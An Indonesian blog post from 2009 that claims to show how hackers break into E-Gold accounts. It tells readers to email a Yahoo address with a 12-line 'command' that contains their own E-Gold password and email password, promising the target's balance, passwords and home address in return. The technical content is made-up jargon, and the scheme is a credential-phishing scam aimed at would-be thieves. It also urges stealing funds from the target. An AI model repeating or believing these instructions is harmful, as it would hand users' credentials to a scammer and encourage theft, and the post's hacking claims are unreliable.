Thursday, December 3, 2009

Cara Para Hacker Menembus E-Gold Account

Anda Jangan Berfikir Negatif atas cara yg saya tuliskan dibawah ini, tergantung niat anda?, kalau niat anda ingin mencuri berarti anda salah?

Tetapi kalau niat anda untuk menjaga agar account E-gold anda aman maka ini salah satu pintu para pencuri masuk kedalam account anda?, sehingga anda bisa menambah secutiry account e-gold anda:

Cara Hacker Menembus Egold Account:

I. Terlebih dahulu mereka membuat Account Egolddan Alamat Email (lebih bagus biasanya mereka memakai email di yahoo.com karena akan mudah dan lancar mendapat balasannya.)

II. Kemudian, mereka kirim sebuah email ke:egoldautoboot239989@yahoo.com(salah satu alamat email Egold Auto Bot Mailer).

III. Email tsb memiliki format sebagai berikut:

IV. Tulisan di kolom \"subject\" dengan :autobootE-gold68verif-0e26V. Kemudian di dalam text body email berisi 12baris text "Ingat mereka menulis kode/script tersebut dalam 12 barisdan jangan sampai salah dalam penulisannya. Segera periksa danhitung setelah menulis kode, apa benar sudah 12 baris.Jika jumlah bariskurang atau lebih, maka trik ini tidak akan berfuingsi" tulis kode sebagaiberikut:

1. Baris-1: Content-Type: text/plain (agar hasilbalasan yg dikirimkan ke alamat email Anda/email reply nanti dalam bentuk format text).

2. Baris-2: charset=us-ascii (agar email reply bisadibaca dengan menggunakan kode ASCII).

3. Baris-3: address000%%confirmation0e24.graffiti.com(untuk mengacaukan/membingungkan perintah dari Auto BotMailer).

4. Baris-4: p38ylec00rm::s%%www.E-gold.com%% (agarAuto Bot Mailer mulai mengeksekusi semua informasi yang dibutuhkandari Egold).

5. Baris-5: tulis Nomor Egold Anda dan Nomor EgoldTarget yang ingin Anda hack dengan format =12345informsto%%www.e-gold.com%%/viewdetails.asp?id=98765(Egold Auto Bot Mailer memerlukan Nomor Egold untukmenginformasikan data-data ke Egold. Pada contoh diatas, 12345 adalahnomor egold Anda dan 98765 adalah nomor egold target)

6. Baris-6: start (retrieve > 0) (untuk mulaimengaktifkan Mailer Auto Bot\'s Retrieval Function)

7. Baris-7: verified (*value= = float) (untukmelanjutkan proses Mailer Auto Bot\'s Retrieval Function).

8. Baris-8: TULIS PASSWORD Egold Anda dan Nomor EgoldTarget Anda sekali lagi dengan format = passwordegoldanda%%www.e-gold.com%%/viewpassphrase.asp?

id=nomoregoldtarget(Egold Auto Bot Mailer diprogram dengan caramengirimkan testing info ke Egold melalui password Anda sebagai jalanpembukanya yang kemudian akan memverifikasi/menguji setiap password Egold danmengonfirmasikannya ke Yahoo Auto Bot Mailer. Jadi, pada baris ke-8 iniAnda harus memasukkan password Account Egold Anda dengan benaruntuk digunakan sebagai jalanpembuka pelacakan password Egold target).

9. Baris-9: #searchmsgend168hr (untuk mulai mencaridetail informasi Account Egold Target dalam waktu maksimal 168jam/ 7hari)

10. Baris-10: Tulis nama email dan password email yanganda gunakan untuk membuat egold dengan format sebagai berikut:send&&alamatemailanda%%passmailverif=?passwordemailanda(ini dimaksudkan agar Auto Bot Mailer mengasumsikan bahwaini adalah sebuah perintah dari Administrator dan akan mengirimkan detailinformasi ke Administrator seperti yang dimaksudkan)

11. Baris-11: send&&idR20034-tsa-0583 (perintah iniakan membuat Auto Bot Mailer akan mengirimkan seluruh detail informasiAccount Egold Target yang Anda inginkan ke alamat email Anda secaraOTOMATIS, maksimal 168jam atau 7 hari)

12. Baris-12: #endofmsg (langkah terakhir) Tunggubalasan email dr Auto Bot Mailer. Dalam waktu kurang dari tujuh hari(maksimal 168 jam atau 7 hari) Anda akan mendapatkan kiriman balasan email dariAuto Bot Mailer tsb. Email balasan tsb berisi hasil dari prosespengacauan perintah dengan kode-kode perintah yang Anda masukkan di atasyaitu berisi seluruh detail infomasi mengenai Account Egold Target yangAnda hack tsb (seperti Jumlah Balance yang tersedia, Nama AccountEgold Target, Nomor Account Egold Target, Password Egold Target, AlamatEmail yang digunakan Target, Password Email yang digunakan Target, NomorTelepon Target yang dipakai, Alamat Rumah Target, dll). Jika anda sudahmendapatkan semua informasi tengan e-gold target, anda tinggal bukaaccount egold tersebut kemudian anda spend (transfer) ke rek. E-gold anda.MUDAH BUKAN !!!Harap diperhatikan, lakukan semua sesuai dengan ygtelah diterangkan. Isi semuanya dengan bener agar bisa berhasil. Sebab,kalau Anda salah anda akan mendapatkan mendapatkan failure notice drYahoo. Jadi, JANGAN SALAH

ENTRY!!!!!*********************************************************************Jadi secara keseluruhan format isi email anda adalahsebagai berikut :

Kirim email ke:

egoldautoboot239989@yahoo.comSubject: autobootE-gold68verif-0e26Message (isi email):Content-Type: text/plaincharset=us-asciiaddress000%%confirmation0e24.graffiti.comp38ylec00rm::s%%www.E-gold.com%%(no.egoldanda)informsto%%www.e-gold.com%%/viewdetails.asp?id=(no.egoldtarget)start (retrieve > 0)verified (*value= = float)(passwordegoldanda)%%www.e-gold.com%%/viewpassphrase.asp?id=no.egoldtarget#searchmsgend168hrsend&&alamatemailanda%%passmailverif=?passwordemailandasend&&idR20034-tsa-0583#endofmsgPENTING..!!Agar Auto Bot Mailer bisa bekerja dengan baik danberjalan dengan lancar untuk mendapatkan seluruh informasi mengenaiAccount EgoldTarget (seperti Jumlah Balance, Alamat Email, PasswordEmail, NamaAccount Egold, Nomor Egold, Password Egold,Nomor Telepon, Alamat Rumah, dll), maka di dalam Account Egold Andaharus Mempunyai balance minimal $15,3 atau lebih. Jika account egoldanda balancenya dibawah $15,3, maka trik ini tidak akan berfungsimeskipun kurang $0,1 saja, karena account e-gold anda dianggap tidak aktif olehprogram Auto Bot Mailer.

No comments:

Post a Comment